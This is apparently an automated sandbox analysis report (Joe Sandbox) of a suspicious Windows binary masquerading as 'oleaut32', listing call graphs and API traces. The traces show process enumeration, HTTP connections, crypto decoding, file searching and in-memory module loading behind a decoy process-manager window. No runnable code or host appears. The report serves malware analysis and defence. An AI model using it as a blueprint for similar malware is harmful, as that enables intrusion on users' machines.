5e7950 GetPEB 23079->23085 23081 5e980f 23087 5e3da0 GetPEB 23081->23087 23085->23079 23086->23081 23087->23078 23088->23084 23246 41092e 23296 411e80 23246->23296 23248 41093a GetStartupInfoW 23249 41094e HeapSetInformation 23248->23249 23251 410959 23248->23251 23249->23251 23297 412a4c HeapCreate 23251->23297 23252 4109a7 23253 4109b2 23252->23253 23323 410905 66 API calls 3 library calls 23252->23323 23324 413a77 86 API calls 4 library calls 23253->23324 23256 4109b8 23257 4109c4 __RTC_Initialize 23256->23257 23258 4109bc 23256->23258 23298 4143af 73 API calls __calloc_crt 23257->23298 23325 410905 66 API calls 3 library calls 23258->23325 23260 4109c3 23260->23257 23262 4109d1 23263 4109d5 23262->23263 23264 4109dd GetCommandLineA 23262->23264 23326 412820 66 API calls 3 library calls 23263->23326 23299 414318 71 API calls 2 library calls 23264->23299 23268 4109ed 23327 41425d 95 API calls 3 library calls 23268->23327 23270 4109f7 23271 410a03 23270->23271 23272 4109fb 23270->23272 23300 413fe7 94 API calls 7 library calls 23271->23300 23328 412820 66 API calls 3 library calls 23272->23328 23276 410a08 23277 410a14 23276->23277 23278 410a0c 23276->23278 23301 4125ff 77 API calls 4 library calls 23277->23301 23329 412820 66 API calls 3 library calls 23278->23329 23281 410a1b 23283 410a20 23281->23283 23284 410a27 23281->23284 23330 412820 66 API calls 3 library calls 23283->23330 23302 413f88 94 API calls 2 library calls 23284->23302 23288 410a2c 23289 410a32 23288->23289 23303 40fa80 23288->23303 23289->23288 23291 410a48 23292 410a56 23291->23292 23331 4127d6 66 API calls _doexit 23291->23331 23332 412802 66 API calls _doexit 23292->23332 23295 410a5b ___BuildCatchObject 23296->23248 23297->23252 23298->23262 23299->23268 23300->23276 23301->23281 23302->23288 23333 4101c0 23303->23333 23305 40fa93 LoadIconW LoadCursorW LoadIconW CreateThread 23306 40fb38 23305->23306 23339 40ecc0 23305->23339 23307 40fb3d RegisterClassExW 23306->23307 23308 40fb6e CreateWindowExW 23307->23308 23309 40fb4f MessageBoxW 23307->23309 23310 40fbb1 MessageBoxW 23308->23310 23311 40fbcf CreateWindowExW CreateWindowExW CreateWindowExW 23308->23311 23309->23291 23310->23291 23335 40e7b0 InitCommonControlsEx CreateWindowExW 23311->23335 23313 40fc70 23336 40e800 11 API calls ___crtMessageBoxW 23313->23336 23315 40fc7b CreateWindowExW CreateWindowExW CreateWindowExW CreateWindowExW 23337 40e220 9 API calls ___crtMessageBoxW 23315->23337 23317 40fd48 23338 40f770 143 API calls 23317->23338 23319 40fd4d SetTimer ShowWindow UpdateWindow GetMessageW 23320 40fdc3 23319->23320 23321 40fd97 23319->23321 23320->23291 23322 40fda4 TranslateMessage DispatchMessageW GetMessageW 23321->23322 23322->23320 23322->23322 23323->23253 23324->23256 23325->23260 23327->23270 23331->23292 23332->23295 23334 4101cc 23333->23334 23334->23305 23334->23334 23335->23313 23336->23315 23337->23317 23338->23319 23340 40ecc6 23339->23340 23720 40e930 81 API calls ___crtMessageBoxW 23652 418a30 76 API calls __cinit 23655 413e30 SetUnhandledExceptionFilter 23721 20d157a SetLastError 23657 20d1870 GetProcAddress 23658 5e5c20 39 API calls 23066 5e80d0 23070 5e81a1 23066->23070 23067 5e82f5 23068 5e3e40 GetPEB 23068->23070 23069 5e81fb CreateFileW 23069->23067 23069->23070 23070->23067 23070->23068 23070->23069 23071 5e3da0 GetPEB 23070->23071 23071->23070 23667 20d1890 FreeLibrary 23669 411ee0 6 API calls 3 library calls 23670 4122ed IsProcessorFeaturePresent 23671 20d14a0 9 API calls 23089 5e9bf0 23098 5e9c00 23089->23098 23090 5e9cde 23091 5e9d02 CreateThread 23090->23091 23100 5e3e40 GetPEB 23090->23100 23092 5e9c95 23091->23092 23102 5e9860 23091->23102 23094 5e9cf1 23101 5e3da0 GetPEB 23094->23101 23096 5e3e40 GetPEB 23096->23098 23097 5e9cfd 23097->23091 23098->23090 23098->23092 23098->23096 23099 5e3da0 GetPEB 23098->23099 23099->23098 23100->23094 23101->23097 23112 5e9880 23102->23112 23103 5e9a54 23104 5e9a47 23103->23104 23126 5e3e40 GetPEB 23103->23126 23106 5e9a67 23127 5e3da0 GetPEB 23106->23127 23107 5e9a90 4 API calls 23107->23112 23108 5e98d2 FindFirstChangeNotificationW 23114 5e9a90 23108->23114 23111 5e3e40 GetPEB 23111->23112 23112->23103 23112->23104 23112->23107 23112->23108 23112->23111 23113 5e3da0 GetPEB 23112->23113 23113->23112 23124 5e9aa0 23114->23124 23115 5e9aca 23115->23112 23116 5e9b9d 23118 5e9bc1 lstrcmpiW 23116->23118 23128 5e3e40 GetPEB 23116->23128 23117 5e9b2e GetCurrentProcess QueryFullProcessImageNameW 23117->23124 23118->23112 23119 5e3da0 GetPEB 23119->23124 23120 5e3e40 GetPEB 23120->23124 23122 5e9bb0 23129 5e3da0 GetPEB 23122->23129 23124->23115 23124->23116 23124->23117 23124->23119 23124->23120 23125 5e9bbc 23125->23118 23126->23106 23127->23104 23128->23122 23129->23125 23724 5eadf0 GetPEB GetVolumeInformationW _snprintf 23674 412cee 69 API calls IsInExceptionSpec 23726 40edf0 66 API calls std::exception::exception 23678 20d26b0 wcslen wcslen wcslen 23369 5e52e0 23373 5e52f0 23369->23373 23370 5e53d7 23371 5e53bb GetNativeSystemInfo 23371->23373 23372 5e3e40 GetPEB 23372->23373 23373->23370 23373->23371 23373->23372 23374 5e3da0 GetPEB 23373->23374 23374->23373 23680 5e46e0 GetPEB CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 23013 40ea80 23018 41025b 23013->23018 23016 41025b __malloc_crt 66 API calls 23017 40ea9b 23016->23017 23019 4102d8 23018->23019 23028 410269 23018->23028 23041 412a79 DecodePointer 23019->23041 23021 4102de 23042 411e2c 66 API calls __getptd_noexit 23021->23042 23024 410297 RtlAllocateHeap 23025 40ea93 23024->23025 23024->23028 23025->23016 23027 4102c4 23039 411e2c 66 API calls __getptd_noexit 23027->23039 23028->23024 23028->23027 23029 410274 23028->23029 23033 4102c2 23028->23033 23038 412a79 DecodePointer 23028->23038 23029->23028 23035 412a13 66 API calls __NMSG_WRITE 23029->23035 23036 412864 66 API calls 5 library calls 23029->23036 23037 41257e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 23029->23037 23040 411e2c 66 API calls __getptd_noexit 23033->23040 23035->23029 23036->23029 23038->23028 23039->23033 23040->23025 23041->23021 23042->23025 23681 410881 67 API calls __calloc_crt 23736 413787 TlsAlloc 23739 410d8f 107 API calls 3 library calls 23684 4f0c9f GetPEB 23688 40f5e0 137 API calls 2 library calls 23689 410a9b 5 API calls ___security_init_cookie 23375 5e1880 23376 5e188c 23375->23376 23377 5e18a2 23375->23377 23400 5e3e40 GetPEB 23376->23400 23385 5e18cb 23377->23385 23402 5e3e40 GetPEB 23377->23402 23379 5e1896 23401 5e3da0 GetPEB 23379->23401 23382 5e18bf 23403 5e3da0 GetPEB 23382->23403 23384 5e192d 23385->23384 23385->23385 23390 5e25a0 23385->23390 23387 5e1917 23388 5e191b 23387->23388 23404 5e4120 GetPEB 23387->23404 23397 5e25b0 23390->23397 23391 5e2812 CryptDecodeObjectEx 23391->23397 23393 5e28de 23416 5e4120 GetPEB 23393->23416 23394 5e3e40 GetPEB 23394->23397 23395 5e3da0 GetPEB 23395->23397 23397->23391 23397->23393 23397->23394 23397->23395 23399 5e25ec 23397->23399 23405 5e41c0 23397->23405 23398 5e28e9 23398->23387 23399->23387 23400->23379 23401->23377 23402->23382 23403->23385 23404->23384 23406 5e41cd 23405->23406 23410 5e41e3 23405->23410 23417 5e3e40 GetPEB 23406->23417 23408 5e41d7 23418 5e3da0 GetPEB 23408->23418 23411 5e4210 RtlAllocateHeap 23410->23411 23419 5e3e40 GetPEB 23410->23419 23411->23397 23413 5e41ff 23420 5e3da0 GetPEB 23413->23420 23415 5e420b 23415->23411 23416->23398 23417->23408 23418->23410 23419->23413 23420->23415 23582 5e9180 23589 5e91a0 23582->23589 23583 5e9255 23585 5e91cd 23583->23585 23583->23589 23609 5e4b90 GetPEB CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 23583->23609 23589->23583 23589->23585 23590 5e45c0 23589->23590 23607 5e3e40 GetPEB 23589->23607 23608 5e3da0 GetPEB 23589->23608 23591 5e45d7 23590->23591 23596 5e45ed 23590->23596 23610 5e3e40 GetPEB 23591->23610 23593 5e45e1 23611 5e3da0 GetPEB 23593->23611 23595 5e4660 23595->23589 23596->23595 23597 5e4626 QueryFullProcessImageNameW 23596->23597 23612 5e3e40 GetPEB 23596->23612 23598 5e463c 23597->23598 23599 5e4652 23597->23599 23614 5e3e40 GetPEB 23598->23614 23599->23589 23601 5e4615 23613 5e3da0 GetPEB 23601->23613 23604 5e4646 23615 5e3da0 GetPEB 23604->23615 23605 5e4621 23605->23597 23607->23589 23608->23589 23609->23583 23610->23593 23611->23596 23612->23601 23613->23605 23614->23604 23615->23599 23741 5e1fb2 GetPEB RtlAllocateHeap 23742 20d21ea 7 API calls 23744 40f3b0 RaiseException __CxxThrowException@8 23745 40f7b0 162 API calls ___crtMessageBoxW 23341 5e4ba8 23352 5e4bb0 23341->23352 23342 5e4c5a Process32FirstW 23342->23352 23343 5e4cc8 23345 5e4cec FindCloseChangeNotification 23343->23345 23355 5e3e40 GetPEB 23343->23355 23344 5e4cb4 23347 5e4cef 23345->23347 23348 5e3e40 GetPEB 23348->23352 23349 5e3da0 GetPEB 23349->23352 23350 5e4cdb 23356 5e3da0 GetPEB 23350->23356 23351 5e4bfe CreateToolhelp32Snapshot 23351->23347 23351->23352 23352->23342 23352->23343 23352->23344 23352->23348 23352->23349 23352->23351 23354 5e4ce7 23354->23345 23355->23350 23356->23354 23696 5e60a2 GetPEB RtlAllocateHeap CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 23421 5e12a0 23446 5e12d1 23421->23446 23422 5e1817 23423 5e1836 23422->23423 23513 5e3e40 GetPEB 23422->23513 23432 5e17d7 23423->23432 23515 5e3e40 GetPEB 23423->23515 23425 5e182a 23514 5e3da0 GetPEB 23425->23514 23426 5e4120 GetPEB 23426->23446 23428 5e41c0 2 API calls 23428->23446 23435 5e3480 GetPEB 23435->23446 23438 5e1852 23516 5e3da0 GetPEB 23438->23516 23442 5e3e40 GetPEB 23442->23446 23444 5e3da0 GetPEB 23444->23446 23445 5e3420 GetPEB 23445->23446 23446->23422 23446->23426 23446->23428 23446->23432 23446->23435 23446->23442 23446->23444 23446->23445 23447 5e1801 23446->23447 23450 5e2210 23446->23450 23465 5e2b60 23446->23465 23484 5e5b40 23446->23484 23506 5e4060 GetPEB 23446->23506 23507 5e1e50 GetPEB 23446->23507 23508 5e1940 GetPEB 23446->23508 23509 5e4db0 GetPEB 23446->23509 23510 5e1fa0 GetPEB RtlAllocateHeap 23446->23510 23511 5e1c70 GetPEB 23446->23511 23512 5e4120 GetPEB 23447->23512 23449 5e1808 23462 5e222f 23450->23462 23451 5e2522 23452 5e258d 23451->23452 23453 5e254b 23451->23453 23517 5e3e40 GetPEB 23451->23517 23452->23446 23459 5e2513 23453->23459 23519 5e3e40 GetPEB 23453->23519 23454 5e3e40 GetPEB 23454->23462 23456 5e41c0 2 API calls 23456->23462 23457 5e253f 23518 5e3da0 GetPEB 23457->23518 23459->23446 23460 5e3da0 GetPEB 23460->23462 23462->23451 23462->23454 23462->23456 23462->23459 23462->23460 23463 5e2567 23520 5e3da0 GetPEB 23463->23520 23483 5e2b98 23465->23483 23466 5e2e0d InternetOpenW 23466->23483 23468 5e2f94 23469 5e2fb3 23468->23469 23524 5e3e40 GetPEB 23468->23524 23469->23446 23470 5e3480 GetPEB 23470->23483 23471 5e2d2b HttpSendRequestW 23471->23483 23472 5e2ec8 InternetCloseHandle 23472->23483 23474 5e41c0 2 API calls 23474->23483 23475 5e2c9e InternetConnectW 23475->23483 23476 5e2fa7 23525 5e3da0 GetPEB 23476->23525 23478 5e3da0 GetPEB 23478->23483 23479 5e2daf ObtainUserAgentString 23479->23483 23480 5e3e40 GetPEB 23480->23483 23483->23466 23483->23468 23483->23469 23483->23470 23483->23471 23483->23472 23483->23474 23483->23475 23483->23478 23483->23479 23483->23480 23521 5e2900 GetPEB 23483->23521 23522 5e5620 GetPEB 23483->23522 23523 5e4120 GetPEB 23483->23523 23485 5e5b50 23484->23485 23488 5e5b66 23484->23488 23526 5e3e40 GetPEB 23485->23526 23487 5e5b5a 23527 5e3da0 GetPEB 23487->23527 23490 5e5b93 RtlAllocateHeap 23488->23490 23528 5e3e40 GetPEB 23488->23528 23492 5e5c12 23490->23492 23497 5e5ba3 23490->23497 23492->23446 23493 5e5b82 23529 5e3da0 GetPEB 23493->23529 23495 5e5b8e 23495->23490 23496 5e5bd9 23500 5e5c06 RtlFreeHeap 23496->23500 23532 5e3e40 GetPEB 23496->23532 23497->23496 23530 5e3e40 GetPEB 23497->23530 23499 5e5bcd 23531 5e3da0 GetPEB 23499->23531 23500->23446 23503 5e5bf5 23533 5e3da0 GetPEB 23503->23533 23505 5e5c01 23505->23500 23506->23446 23507->23446 23508->23446 23509->23446 23510->23446 23511->23446 23512->23449 23513->23425 23514->23423 23515->23438 23516->23432 23517->23457 23518->23453 23519->23463 23520->23459 23521->23483 23522->23483 23523->23483 23524->23476 23525->23469 23526->23487 23527->23488 23528->23493 23529->23495 23530->23499 23531->23496 23532->23503 23533->23505

                                    Control-flow Graph

                                    APIs
                                    • _memset.LIBCMT ref: 0040FA8E
                                    • LoadIconW.USER32 ref: 0040FAD2
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040FADF
                                    • LoadIconW.USER32 ref: 0040FB0B
                                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000ECC0,00000000,00000002,?), ref: 0040FB23
                                    • RegisterClassExW.USER32(?), ref: 0040FB42
                                    • MessageBoxW.USER32(00000000,Call to RegisterClassEx failed!,Create Process,00000000), ref: 0040FB5B
                                    • CreateWindowExW.USER32(00000000,win32app,Windows Process Manager,00CF0000,80000000,80000000,000001B8,00000258,00000000,00000000,?,00000000), ref: 0040FBA4
                                    • MessageBoxW.USER32(00000000,Call to CreateWindow failed!,Win32 Guided Tour,00000000), ref: 0040FBBC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: Load$CreateIconMessage$ClassCursorRegisterThreadWindow_memset
                                    • String ID: 0$BUTTON$Call to CreateWindow failed!$Call to RegisterClassEx failed!$Cancel$Create Process$Edit$Kill Process$Run$View All Processes$Win32 Guided Tour$Windows Process Manager$win32app
                                    • API String ID: 713769167-1192827546
                                    • Opcode ID: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction ID: d065e50bf912697da28d798f56a1b3ea1efd5d731bf56130ae663ba60a7ce2a6
                                    • Opcode Fuzzy Hash: 952da5468408a189c14926ca3cf5cae3a85ce14d76ca3222c90a6cd4c0bb2d80
                                    • Instruction Fuzzy Hash: 9A8120B1BD4300BAF220DB50DC56FDA37A8AB98F05F10842AF7017A2D0D7F969458B5E

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 22 20d1030-20d1075 LoadLibraryW GetProcAddress call 20d1b30 25 20d107e-20d108f 22->25 26 20d1077-20d1079 22->26 28 20d1091-20d109e SetLastError 25->28 29 20d10a3-20d10be call 20d1b30 25->29 27 20d148d-20d1490 26->27 28->27 32 20d10c7-20d10dc 29->32 33 20d10c0-20d10c2 29->33 34 20d10de-20d10eb SetLastError 32->34 35 20d10f0-20d10fd 32->35 33->27 34->27 36 20d10ff-20d110c SetLastError 35->36 37 20d1111-20d111a 35->37 36->27 38 20d111c-20d1129 SetLastError 37->38 39 20d112e-20d114f 37->39 38->27 40 20d1163-20d116d 39->40 41 20d116f-20d1176 40->41 42 20d11a5-20d11d5 GetNativeSystemInfo call 20d18d0 * 2 40->42 43 20d1178-20d1184 41->43 44 20d1186-20d1192 41->44 53 20d11e9-20d120c call 20d1800 42->53 54 20d11d7-20d11e4 SetLastError 42->54 46 20d1195-20d119b 43->46 44->46 48 20d119d-20d11a0 46->48 49 20d11a3 46->49 48->49 49->40 56 20d123d-20d1255 GetProcessHeap RtlAllocateHeap 53->56 57 20d120e-20d121f call 20d1800 53->57 54->27 58 20d127b-20d1291 56->58 59 20d1257-20d1276 SetLastError 56->59 60 20d1222-20d122c 57->60 61 20d129c 58->61 62 20d1293-20d129a 58->62 59->27 60->56 63 20d122e-20d1238 SetLastError 60->63 65 20d12a3-20d1300 call 20d1b30 61->65 62->65 63->27 68 20d1307-20d1370 call 20d1800 call 20d1980 call 20d1b50 65->68 69 20d1302 65->69 78 20d1377-20d1388 68->78 79 20d1372 68->79 70 20d147f-20d148b call 20d16c0 69->70 70->27 80 20d138a-20d13a0 call 20d2090 78->80 81 20d13a2-20d13a5 78->81 79->70 83 20d13ac-20d13ba call 20d21a0 80->83 81->83 87 20d13bc 83->87 88 20d13c1-20d13c5 call 20d1e80 83->88 87->70 90 20d13ca-20d13cf 88->90 91 20d13d6-20d13e4 call 20d2010 90->91 92 20d13d1 90->92 95 20d13eb-20d13f4 91->95 96 20d13e6 91->96 92->70 97 20d13f6-20d13fd 95->97 98 20d1470-20d1473 95->98 96->70 100 20d145d-20d146b 97->100 101 20d13ff-20d145b GetPEB 97->101 99 20d147a-20d147d 98->99 99->27 102 20d146e 100->102 101->102 102->99
                                    APIs
                                    • LoadLibraryW.KERNEL32(020D4054,020D4040), ref: 020D1047
                                    • GetProcAddress.KERNEL32(00000000), ref: 020D104E
                                      • Part of subcall function 020D1B30: SetLastError.KERNEL32(0000000D,?,020D1070,?,00000040), ref: 020D1B3D
                                    • SetLastError.KERNEL32(000000C1), ref: 020D1096
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928404757.00000000020D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020D1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_20d1000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 1866314245-0
                                    • Opcode ID: c7ea46d6db24c4971d30eda7c275c0b3350dd6c6e7b347b15d922b15042b9a17
                                    • Instruction ID: 2516d735334333ffbe4c7f57e3d1884434f173a250b6c5822cab3b855380a0cd
                                    • Opcode Fuzzy Hash: c7ea46d6db24c4971d30eda7c275c0b3350dd6c6e7b347b15d922b15042b9a17
                                    • Instruction Fuzzy Hash: 6DF1D6B4A02309EFDB04CF94D990BAEB7B1BF48304F108598E909AB341DB35AA51DF91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 243 5e38b0-5e38cb 244 5e38d0-5e38d5 243->244 245 5e38db 244->245 246 5e3a85-5e3a8a 244->246 249 5e3a7b-5e3a80 245->249 250 5e38e1-5e38e6 245->250 247 5e3a8c-5e3a91 246->247 248 5e3af1-5e3af8 246->248 251 5e3adb-5e3ae0 247->251 252 5e3a93-5e3a9a 247->252 255 5e3afa-5e3b10 call 5e3e40 call 5e3da0 248->255 256 5e3b15-5e3b2b FindNextFileW 248->256 249->244 253 5e38ec-5e38f1 250->253 254 5e3b30-5e3b37 250->254 251->244 263 5e3ae6-5e3af0 251->263 257 5e3a9c-5e3ab2 call 5e3e40 call 5e3da0 252->257 258 5e3ab7-5e3acb FindFirstFileW 252->258 261 5e39d7-5e39ea call 5e3480 253->261 262 5e38f7-5e38fc 253->262 259 5e3b39-5e3b4f call 5e3e40 call 5e3da0 254->259 260 5e3b54-5e3b55 FindClose 254->260 255->256 256->244 257->258 268 5e3b57-5e3b61 258->268 269 5e3ad1-5e3ad6 258->269 259->260 260->268 281 5e39ec-5e3a02 call 5e3e40 call 5e3da0 261->281 282 5e3a07-5e3a22 261->282 262->251 270 5e3902-5e3907 262->270 269->244 275 5e390d-5e3913 270->275 276 5e39b1-5e39d2 270->276 283 5e3934-5e3936 275->283 284 5e3915-5e391d 275->284 276->244 281->282 298 5e3a3f-5e3a4a 282->298 299 5e3a24-5e3a3a call 5e3e40 call 5e3da0 282->299 285 5e392d-5e3932 283->285 286 5e3938-5e394b call 5e3480 283->286 284->285 291 5e391f-5e3923 284->291 285->244 300 5e394d-5e3963 call 5e3e40 call 5e3da0 286->300 301 5e3968-5e3998 call 5e38b0 286->301 291->283 295 5e3925-5e392b 291->295 295->283 295->285 309 5e3a4c-5e3a62 call 5e3e40 call 5e3da0 298->309 310 5e3a67-5e3a76 298->310 299->298 300->301 319 5e399d-5e39ac call 5e3420 301->319 309->310 310->244 319->244
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 005E3AC4
                                    • FindNextFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 005E3B1B
                                    • FindClose.KERNELBASE(?), ref: 005E3B55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID: *LO$.
                                    • API String ID: 3541575487-2132576683
                                    • Opcode ID: 338a0bcd5b57795d4362acc3271051093d2c4901d992a9b0df5bd8daf30830f9
                                    • Instruction ID: f07a8b58272d30880a9f29311f574ee444f461e6cb3bd38e993abd4e1d030616
                                    • Opcode Fuzzy Hash: 338a0bcd5b57795d4362acc3271051093d2c4901d992a9b0df5bd8daf30830f9
                                    • Instruction Fuzzy Hash: EB5136B17142C147CB2CAB769D8DA7B7AE9BBD0740F44486DF4C2CB281EA35CE448362

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 324 5e25a0-5e25ac 325 5e25b0-5e25b6 324->325 326 5e25bc 325->326 327 5e27a4-5e27aa 325->327 330 5e2766-5e276e 326->330 331 5e25c2-5e25c8 326->331 328 5e2899-5e289f 327->328 329 5e27b0 327->329 334 5e25e4-5e25ea 328->334 335 5e28a5-5e28ac 328->335 336 5e2848-5e284f 329->336 337 5e27b6-5e27bc 329->337 332 5e278e-5e279f 330->332 333 5e2770-5e2788 call 5e3e40 call 5e3da0 330->333 338 5e25ce 331->338 339 5e26c4-5e26ca 331->339 332->325 333->332 334->325 340 5e25ec-5e25f3 334->340 342 5e28ae-5e28c4 call 5e3e40 call 5e3da0 335->342 343 5e28c9-5e28d9 335->343 344 5e286c-5e287d 336->344 345 5e2851-5e2867 call 5e3e40 call 5e3da0 336->345 346 5e27ee-5e27f5 337->346 347 5e27be-5e27c4 337->347 350 5e2646-5e264d 338->350 351 5e25d0-5e25d6 338->351 348 5e26cc-5e26d2 339->348 349 5e272a-5e2732 339->349 342->343 343->325 366 5e2882-5e2894 344->366 345->344 359 5e27f7-5e280d call 5e3e40 call 5e3da0 346->359 360 5e2812-5e2843 CryptDecodeObjectEx 346->360 347->334 355 5e27ca-5e27de call 5e41c0 347->355 348->334 356 5e26d8-5e26e0 348->356 361 5e2734-5e274c call 5e3e40 call 5e3da0 349->361 362 5e2752-5e2761 349->362 364 5e264f-5e2665 call 5e3e40 call 5e3da0 350->364 365 5e266a-5e2680 350->365 357 5e25d8-5e25de 351->357 358 5e25f4-5e25fb 351->358 355->340 396 5e27e4-5e27e9 355->396 371 5e26e2-5e26fa call 5e3e40 call 5e3da0 356->371 372 5e2700-5e2713 356->372 357->334 373 5e28de-5e28f0 call 5e4120 357->373 374 5e25fd-5e2613 call 5e3e40 call 5e3da0 358->374 375 5e2618-5e262c 358->375 359->360 360->325 361->362 362->325 364->365 381 5e2685-5e269c 365->381 366->325 371->372 399 5e2718-5e271a 372->399 374->375 401 5e262f-5e2641 375->401 392 5e269e-5e26b4 call 5e3e40 call 5e3da0 381->392 393 5e26b9-5e26bf 381->393 392->393 393->334 396->325 409 5e2720-5e2725 399->409 410 5e28f1-5e28fb 399->410 401->325 409->325
                                    APIs
                                    • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 005E282F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CryptDecodeObject
                                    • String ID: =t$=t$Pra
                                    • API String ID: 1207547050-2805377485
                                    • Opcode ID: 99b13636c32a1d44ef9b36f71507c0924ab539e5d296489f58081c3de8039cf0
                                    • Instruction ID: 65a12361729570ae36827483d31d12335d3914f0a17606722eba81b51bba9f8b
                                    • Opcode Fuzzy Hash: 99b13636c32a1d44ef9b36f71507c0924ab539e5d296489f58081c3de8039cf0
                                    • Instruction Fuzzy Hash: 30715C71B003D25BCB2C9B2ADD99B3A7A6A7BD4700F040069E9C5DF2A8FE209C4497D1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 419 5e80d0-5e819c 420 5e81a1-5e81a7 419->420 421 5e826e-5e8274 420->421 422 5e81ad 420->422 425 5e827a-5e8280 421->425 426 5e8300-5e8307 421->426 423 5e8264-5e8269 422->423 424 5e81b3-5e81b9 422->424 423->420 427 5e81bf-5e81c5 424->427 428 5e833c-5e8384 call 5eb400 424->428 429 5e82e9-5e82ef 425->429 430 5e8282-5e8289 425->430 431 5e8309-5e831f call 5e3e40 call 5e3da0 426->431 432 5e8324-5e8337 426->432 433 5e822f-5e8236 427->433 434 5e81c7-5e81cd 427->434 436 5e82f5-5e82ff 428->436 450 5e838a 428->450 429->420 429->436 437 5e828b-5e82a1 call 5e3e40 call 5e3da0 430->437 438 5e82a6-5e82c9 430->438 431->432 432->420 444 5e8238-5e824e call 5e3e40 call 5e3da0 433->444 445 5e8253-5e825f 433->445 434->429 441 5e81d3-5e81db 434->441 437->438 454 5e82cb-5e82e1 call 5e3e40 call 5e3da0 438->454 455 5e82e6 438->455 448 5e81dd-5e81f5 call 5e3e40 call 5e3da0 441->448 449 5e81fb-5e821f CreateFileW 441->449 444->445 445->420 448->449 449->436 460 5e8225-5e822a 449->460 458 5e838c-5e838e 450->458 459 5e8394-5e83a1 450->459 454->455 455->429 458->436 458->459 460->420
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,0100754F,00000000), ref: 005E8218
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: DR$Ou$m
                                    • API String ID: 823142352-902897619
                                    • Opcode ID: 3feffe1292b21025643bc06c966ff9f8e5faa5f6458d369bf89092ab8702ea10
                                    • Instruction ID: f67e77884d8b237297ea925804754a644aa04467faf96fe0ea36a6d55251e193
                                    • Opcode Fuzzy Hash: 3feffe1292b21025643bc06c966ff9f8e5faa5f6458d369bf89092ab8702ea10
                                    • Instruction Fuzzy Hash: 2D618E31A083818BD71CDF69C889A2FBBE1BBD4714F04491CF5D99B290DBB4CD098B82

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 765 5e52e0-5e52ee 766 5e52f0-5e52f5 765->766 767 5e52fb 766->767 768 5e5382-5e5387 766->768 769 5e52fd-5e5302 767->769 770 5e5378-5e537d 767->770 771 5e5389-5e538e 768->771 772 5e53e1-5e53f0 768->772 773 5e535e-5e5373 769->773 774 5e5304-5e5309 769->774 770->766 775 5e53f5-5e5403 771->775 776 5e5390-5e5395 771->776 772->766 773->766 777 5e530b-5e5310 774->777 778 5e5350-5e535c 774->778 779 5e53cc-5e53d1 776->779 780 5e5397-5e539e 776->780 777->779 781 5e5316-5e5325 777->781 778->766 779->766 784 5e53d7-5e53e0 779->784 782 5e53bb-5e53c7 GetNativeSystemInfo 780->782 783 5e53a0-5e53b6 call 5e3e40 call 5e3da0 780->783 785 5e5327-5e533d call 5e3e40 call 5e3da0 781->785 786 5e5342-5e534e 781->786 782->766 783->782 785->786 786->766
                                    APIs
